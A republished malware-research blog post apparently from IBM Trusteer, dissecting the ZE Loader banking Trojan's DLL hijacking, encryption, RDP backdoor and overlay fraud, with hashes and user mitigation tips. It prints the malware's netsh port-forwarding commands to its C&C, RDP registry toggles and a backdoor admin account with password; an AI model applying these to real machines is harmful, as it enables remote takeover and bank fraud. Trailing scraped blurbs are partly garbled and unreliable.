New ZE Loader Targets Online Banking Users – Security Intelligence

Trojan ProxyEgg New ZE Loader Targets Online Banking Users - Security Intelligence

New ZE Loader Targets Online Banking Users

IBM Trusteer closely follows developments in the financial cyber crime arena. Recently, we discovered a new remote overlay malware that is more persistent and more sophisticated than most current-day codes. In this post we will dive into the technical details of the sample we worked on and present ZE Loader’s capabilities and features. The parts that differ from other malware of this kind are:

  • Installation of a backdoor to the victim’s device
  • Remaining stealthy in the guise of legitimate software
  • Holding permanent assets on the victim’s device
  • Stealing user credentials.

Another aspect we examine here is the malware’s algorithms used in the encryption of its resources and events. We will suggest some tactics to detect the presence of ZE Loader on infected devices to mitigate its potential impact.

Overlay Malware Is an Enduring Threat

Overlay malware is not a new threat, nor is it very sophisticated. Yet, this malware category, which typically spreads in Latin America, Spain and Portugal, is an enduring one. We keep seeing it used in attacks on online banking users in those regions, and its success fuels the interest of cyber criminals to continue using it.

In the case of ZE Loader, we did see some new features that push the typical boundaries of overlay Trojans. For example, most malware in this category does not keep assets on the infected device, but ZE Loader does. In most cases, this sort of malware does not go to the lengths of hiding its presence; its lifecycle is short and the effort is futile. ZE Loader does use some stealth tactics.

Typical Attack Anatomy

A remote overlay attack follows a rather familiar path. Once the user becomes infected — usually via malspam, phishing pages or malicious attachments — the malware is installed on the target device. In most cases, the malware begins monitoring browser window names for a targeted bank’s site. It then goes into action upon access to a hard-coded list of entities. With the regional focus of this malware type, it mostly goes after local banks.

Once the user lands on a targeted website, the attacker is notified in real-time. The attacker can then take over the device remotely using the remote access feature. As the victim accesses their online banking account, the attacker can see their activity and choose a time to interject. To trick users into divulging authentication codes or other personal data, attackers display full-screen overlay images that keep the victim from continuing the banking session. In the background, the attacker initiates a fraudulent money transfer from the compromised account and leverages the victim’s presence in real-time to obtain the required information to complete it.

It’s not an automated fraud scheme, but it is one that keeps working in certain parts of the world, which makes it a risk that banks must continue to reckon with.

Figure 1: Remote overlay Trojan: Typical kill chain (source: IBM Trusteer)

ZE Loader’s Execution and Post-Infection Behavior

ZE Loader hides as part of legitimate software by performing a dynamic link library (DLL) hijacking. Using a malicious DLL instead of the original one, it replaces a DLL named DVDSetting.dll.

In a recent campaign we analyzed, the attackers were using several payload options to infect the victim’s device. These payloads’ folders contained binary files from legitimate applications. Once executed, the seemingly benign applications would load the malware’s malicious DLL.

ZE Loader keeps its assets, such as fake images and files it runs, in a legitimate software’s folder as shown below.

Figure 2: ZE Loader’s malicious elements hidden inside a legitimate program’s folder

The malicious files being fetched from such folders are:

File/ DLL name Type Purpose
JDK_SDK Folder Contains all the images the malware uses in encrypted form.
DVDSettings.dll A Dephi DLL Decrypts and loads relevant components of the malware to run it.
operation.dll A Dephi DLL Responsible for installing and running remote desktop protocol (RDP) service on the infected device.
procSettings.dll A Delphi DLL Contains the main logic of the attack.
Host Contains malware’s settings in encrypted form.
isCon.tlb Contains malware’s settings in encrypted form.

To evade any antivirus which might detect some of its resources, the ZE Loader changes its names or file extensions. For example: will change to c0V3l3A9R0P4b9w1c7q3W7M6u4A2d9Z5B9Q2F4T2A0T2h7U9M8T6p8M6r3H4_.exe


Figure 3: ZE Loader switches file names to evade antivirus detection

Optional payload paths we found when we analyzed this malware were:

  • %programdata%\*\ PCHEALTH\*
  • %programfiles%\gMDwkHvX\*
  • %userprofile%\*\y0X7K4P8f5z5E2R1Y6t1B8y8l6Q1v9\*
  • %userprofile%\*\Videos\Vss\I1i4M0d6N8C3a7t9C0j8N8I6I6w3f0v7A4Y1m0Z2k7Q7E6x3P0F3a5P0o4u6_.exe

When we looked at a machine we infected with ZE Loader, we saw additional file paths used:

  • C:\ProgramData\Trusteer\PCHEALTH\avformat.dll
  • C:\Program Files\gMDwkHvX\rdpwrap.dll
  • Avira folder: C:\Users\****\y0X7K4P8f5z5E2R1Y6t1B8y8l6Q1v9\

While we did see the malware’s operators hide it in the guise of more than one legitimate program, the JDK_SDK payload remained the same throughout the campaign.

ZE Loader’s Attack Anatomy

When we viewed the ZE Loader attack from an anatomy perspective, the elements interact as follows:

Figure 4: ZE Loader’s attack anatomy

Running the legitimate program used as ZE Loader’s front also loads the malicious DLL. In this case, it is DVDSetting.dll, and we can see in the image below that the legitimate software imports that DLL.

Figure 5: Malicious DLL being imported instead of the original, legitimate one

After the malicious DLL is loaded, the SetDecoderMode function in DVDSettings.dll reads the encrypted file procSettings and decrypts it.

This encrypted malicious file is a UPX-packed Delphi DLL that contains most of the logic of this overlay malware. Inside DVDSettings.dll there is also some embedded shellcode, also in encrypted form, which is responsible for unpacking and running the procSettings UPX-packed DLL post decryption.

Figure 6: DVDSettings.dll reads the encrypted file procSettings and decrypts it

In the image below we can see that the first call to the ‘decrypt’ function will decrypt the procSetting DLL file. The second call to the ‘decrypt’ function will result in decrypting the shellcode to unpack and run the procSetting DLL file.

Figure 7: First call to ‘decrypt’ function will decrypt the procSetting DLL file.

Next, the decrypted shellcode unpacks the decrypted procSettings DLL file and then calls the entry point of procSettings DLL.

The procSettings DLL

To find out more about what’s inside this core DLL, we performed a static examination of the DLL. This did not shed light on its functionality and rules that govern its activity. One of the things we did see is that this DLL is Borland Delphi compiled and that it imports different functions from different DLLs. This suggests that procSettings is the DLL that holds most of the logic of the malware and its implementation.

A dynamic analysis we ran allowed us to examine the exported function THetholdImplementationIntercept. We saw that first the malware created a mutex with the name CodeCall.Net Mutey in order to prevent multiple instances of the malware running at the same time.

Next, the malware ran a check to discern whether the targeted bank application was installed on the infected device. It did that by searching the software directory under %appdatalocal%.

If the software the attackers are interested in is indeed installed on the device, it further checks if the file C:\ProgramData\ exists. This file is one of the malware’s files, used as an indicator; this file is empty of content.

Figure 8: ZE Loader’s indicator file that checks for previous infection

If ZE Loader’s scan identifies that this is the first time the malware has run on that device, it executes a series of steps as follows.

  1. First, ZE Loader checks that it is running with administrator privileges.

Figure 9: ZE Loader’s privilege check — “Is user admin?”

  1. ZE Loader executes a couple of Netshell commands in order to create a new connection for establishing an RDP connection to the command-and-control server (C&C).
    1. The first command it executes is ‘netsh interface portproxy reset’ in order to reset the proxy configuration settings.
    2. Next, it opens two proxy connections to eavesdrop on and have a connection to the C&C server:

netsh interface portproxy add v4tov4 listenport=1534 listenaddress= connectport=1534

netsh interface portproxy add v4tov4 listenport=27015 listenaddress= connectport=27015

  1. Next, ZE Loader loads the encrypted file ‘operationB’, decrypts and unpacks it. The encryption and unpacking methods are the same as before. This file is a malicious DLL that is responsible for setting an outbound RDP connection to the C&C.

Figure 10: ZE Loader opens an outbound RDP connection

OperationB DLL

We began with a static examination of the malicious DLL ‘OperationB.’ Examining the DLL’s resource section, we saw that it contained some legitimate RDP DLLs, including the right ones for each Windows architecture, as well as RDP configuration files.

Figure 11: RDP files used by ZE Loader

Figure 12: RDP configuration as used by ZE Loader

Dynamically running this malicious DLL, we see that it begins by saving the RDP DLL and its configuration on disk under a randomly generated directory; in this case, saved under %programFiles%.

Manipulating Security Settings

In the next step, ZE Loader manipulates some security settings to enable the attacker to have undisturbed remote access to the infected device.

ZE Loader searches for the service ‘TermService’. This service allows RDP connections to stream to and from the client device. ZE Loader sets its configuration settings to SERVICE_AUTO_START with the path of the RDP DLL file it already saved on disk.

Next, ZE Loader changes the settings of the infected device to allow and establish multiple RDP connections to and from that device. The following settings are toggled to ‘true’:

  • HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnection
  • HKLM\System\CurrentControlSet\Control\Terminal Server\Licensing Core\EnableConCurrentSessions
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipuleTSSession

Figure 13: RDP configuration allows connections to and from the infected device

Additional RDP settings are configured to enable the attacker to eventually use the remote access to the infected device without much effort.

Figure 14: RDP configuration bypasses security on the infected device

The malware adds a new user account to the victim’s local area network settings with the name Administart0r and password 123mudar. To ensure it is allowed to perform admin actions on the device, the malware adds the new malicious user to the localgroup ‘administradores’.

Figure 15: ZE Loader adds a user to the administrator’s local group

In the last step of the malware, before an attack is performed, ZE Loader further sets a new rule in the firewall that allows anyone to use RDP connections.

Figure 16: ZE Loader creates firewall rule to allow RDP connections for all

Going Into Action Mode

Once it is resident on the infected device and all the preparations are in place, ZE Loader begins monitoring the victim’s activity on the web browser, waiting for them to authenticate an online banking session or access a designated banking application on the desktop. To do that, it monitors running processes and will kill the corresponding process if one is started:

Figure 17: ZE Loader kills the process of designated banking apps if any are opened

After killing the app processes, it loads an encrypted string fetched from the file ‘Host.hst.’ This file contains the encrypted domain name: ‘’

To trick the victim into believing the app did open, the malware sets up a new window to pop up with app images. It loads and decrypts an image that corresponds to the targeted bank brand from the encrypted images directory: /JDK_SDK.

Figure 18: ZE Loader loading fake images from its locally stored trove

As part of the attack, the malware presents different pages/images that mimic bank applications in order to trick the victim into entering their credentials into data fields in the image. The attacker uses those to either take the session over on web browsers or access the application remotely through the victim’s device using an RDP connection.

ZE Loader’s Cryptography

ZE Loader uses a couple of cryptographic algorithms as part of its execution and to hide assets and files. The following are the main findings from our analysis:

Decrypt(data, IV_array, IV_size, size)

This function is responsible for decrypting the different assets of the malware, including DLL files, embedded shellcode, images, etc.

The function’s available parameters are:

  • Data: the encrypted data to be decrypted
  • IV_array: array of values needed for the decryption process
  • IV_size: length of the IV array
  • Size: size of the encrypted data.

Figure 19: ZE Loader’s decryption function parameters

Command_or_decrypt(command, encrypted_str, result)

This function is responsible for the decryption of strings embedded in the sample. The available parameters of the function are:

  • Command: there are two types of commands for this function — C & D
  • Encrypted str: the encrypted string
  • Result: array that will contain the decrypted string.

Figure 20: ZE Loader’s string decryption function parameters

Decrypt_image(image_path, decrypted_image, key)

This function is responsible for decrypting images that the malware keeps locally, hidden in the directory JDK_SDK. The decryption algorithm the malware uses is the BlowFish encryption algorithm with the hard-coded key ‘1’. Blowfish is a symmetric-key block cipher that provides a good encryption rate in software and was likely used for that reason. The parameters of the function are:

  • Image_path: path of the encrypted image
  • Decrypted_image: the decrypted image after the decryption process
  • Key: key for the decryption algorithm; the key is the hard-coded char ‘1’.

Figure 21: ZE Loader’s image decryption function and its parameters

Piecing It Together

The malware keeps encrypted images that mimic its various targets’ websites and designated applications locally in the ‘JDK_SDK’ directory. After decrypting that directory, we were able to access a wide range of targets. On top of popular banks, the malware targets some blockchain platforms and cryptocurrency exchange platforms.

The images also led to insights regarding some of the sophisticated ways the attacker overcomes two-factor authentication challenges in order to steal user credentials. For example, one of the malware’s assets named ‘coin.tlb’ is a file that contains two encrypted strings. After decrypting the strings, we found the two strings below:

ZE 19/01/2021 — malware version was extracted from the malware configuration settings.

Remote Overlay Trojans Still Going Strong

While it is a dated threat, remote overlay Trojans are an enduring staple in the cyber crime arena. Prolific in Latin America, they also target European countries where the same languages are spoken, so as to maximize the reach of their attacks. The strength of attacks that leverage this malware type is the remote access to user devices. Adding manual work in real time allows attackers to extract critical transaction elements from their victims and finalize transactions that are otherwise adequately protected.

While it lacks sophistication on the code level, its overall scheme continues to work. To mitigate the risk of remote overlay Trojans, here are some things users can do:

  • Do not open unsolicited emails and don’t click links or attachments inside such messages
  • Do not log in to bank accounts from an email that appears to urge action
  • When in doubt, call your bank
  • Have an antivirus installed on your device and turn on automatic updates
  • Keep your operating system and all programs up to date
  • Delete applications that are not in use
  • Disable remote connections to your device. Press Windows + X à click ‘System’. From the left sidebar click ‘Remote Desktop’ and make sure the remote desktop option is toggled off.

To keep up to date about IBM Trusteer blogs, visit and find content that can help you better manage the risk of malware and online fraud in your personal and business activities.


5bf9e6e94461ac63a5d4ce239d913f69 – DVDSetting.dll

8803df5c4087add10f829b069353f5b7 – operationB

520170d2edfd2bd5c3cf26e48e8c9c71 – procSettings

39aa9dadd3fc2842f0f2fdcea80a94c7 – Host.hst

25e60452fa27f01dc81c582a1cbec83f – IsCon.tlb

4280f455cf4d4e855234fac79d5ffda0 –

C2 Server


Nir Somech

Malware Researcher – Trusteer IBM

Nir Somech is an engineer working as part of IBM X-Force research. He specializes in researching attacks targeting the financial threat landscape. Nir holds …
read more

Source of this news:

Related posts:

Silence Therapeutics : Condensed consolidated income statement (unaudited) - Form 6-K/A - Marketscre...
Condensed consolidated income statement (unaudited) Six months ended June 30,2021 June 30,2020 £000s (except per share information) Revenue ...
Windows 11 Build 22000.120 Drops for Both Dev & Beta Channels with a Massive List of Fixes - Wcc...
Microsoft's Windows development team has today released Windows 11 Insider Preview Build 22000.120 for Insiders in both the Dev Channel and the Beta Channel. Today's build brings a handful of improv...
Roshan announces release of VPN feature for its Edge Browser to protect users' data 1st Digital Info...
Microsoft Windows’ Default Technique, Edge obtaining a inserted VPN for hiding users’ IP address. Much like other internet browsers namely Opera and Baidu browsers, the Microsoft Restive is also go...
Why Dedicated Proxies Should Be On Your Proxy List - Shout Out UK
Dedicated proxies are private proxies assigned for exclusive use by one user or device at a time. All proxies serve the main purpose of hiding the identity of a user by masking his IP address. They a...
READ How to bypass YouTube blocking with proxy server - Sprout Wired
Crash while using YouTube Youtube It is widely used by Internet users. It is one of the most important streaming video platforms. However, sometimes we may have problems accessing certain vide...
Con artists using HP cops, imp persons fake WhatsApp IDs, alert issued - All the Statesman
Himachal Pradesh Police on Sunday made aware the netizens of hacker creating fake WhatsApp IDs of important persons since cops of the state to successfully dupe people and aware them not to inte...
Attackers combine proxy shell divots and attack Microsoft Exchange / Market Research Telecast
Management should update Microsoft Exchange outcome of attacks. After successful disorder, attackers can execute known dangerous code. Security updates have been used since May and July. After...
NordVPN Black Friday Sale: Save 72% on a 2-Year Plan guideline PCMag AU
Get two years associated with secure browsing for as little as $3. 29 per month. NordVPN is offering twenty-four of service for $3. 29 per month —that's 72% off the regular public sale pric...
EVS unveils asset management shopping cart software for live production, MediaCeption Signature - Ne...
EVS is complete with announced the launch amongst MediaCeption Signature 1 . 0, the company’s latest-generation end-to-end asset management solution on fast turnaround productions. MediaCeption Si...
How to fix the 0x800f0831 Windows 11 update error -
by Vladimir Popescu Being an artist his entire life while also playing handball at a professional level, Vladimir has also developed a passion for all things computer-related. With an inna...
Install Code-Server for VS code on Ubuntu 22.04 or 20.04 LTS - Linux Shout
Code Server is an open-source project to program on VS Code but using a web browser. Here we learn the command to install Code Server on Ubuntu 22.04 Jammy JellyFish or 20.04 Focal Fossa. VS Code...
Update on IPv6 Plans for Virgin Media, TalkTalk, Plusnet and Vodafone -
A number of our readers have been asking for an update on the progress being made by several major UK broadband ISPs, including TalkTalk, Vodafone, Plusnet and Virgin Media (VMO2), toward the deploym...
Bedrock ICS Proxy Solution Helping Utility Transition Seamlessly to Modern, Cyber Secure Automation ...
Bedrock Automation is the maker of Bedrock OSA®, the world’s most powerful and secure industrial control system. A Colorado utility is upgrading PLCs in this control room to modern, cyber secure auto...
Mid Level Back End Java Developer R850K PA - Remote at e-Merge IT Recruitment - IT-Online
A Global Wealth & Investment Management hub is looking for a Mid-Level Right back End Java Developer, with some cloud knowledge You may join a down-to-earth couple of technically sound developer...
Bloom Energy and Heliogen Join Forces to Harness the Power of the Sun to Produce Low-Cost Green Hydr...
PASADENA, Calif. & SAN JOSE, Calif.--(BUSINESS WIRE)--Jul 22, 2021--Heliogen and Bloom Energy (NYSE: BE) today announced plans to produce green hydrogen using only concentrated solar power and w...
Worldwide Neutral Hosting Industry to 2026 - Featuring Alpha Wireless, American Tower and BT Wholesa...
DUBLIN--(BUSINESS WIRE)--Aug 9, 2021--The "Neutral Hosting Market by Technology, Spectrum, Wireless Type, Solution, Deployment Modes and Industry Verticals 2021 - 2026" report has been added to Rese...
Bitcoin ETF roars in debut with US$145M of trading volume - BNN
North America’s first Bitcoin ETF got off to a stellar start in its first day of trading, with investors exchanging US$145 million worth of shares.After a relentless surge in the world’s largest digi...
Everything you need to know about NordVPN - Mashable
Not bad, NordVPN. We were hopping around proxy servers on Chrome without any drops in speed. This is what using a virtual private network (VPN) should feel like. We noticed a similar experience on an...

IP Rotating Proxy Onsale


First month free with coupon code FREE30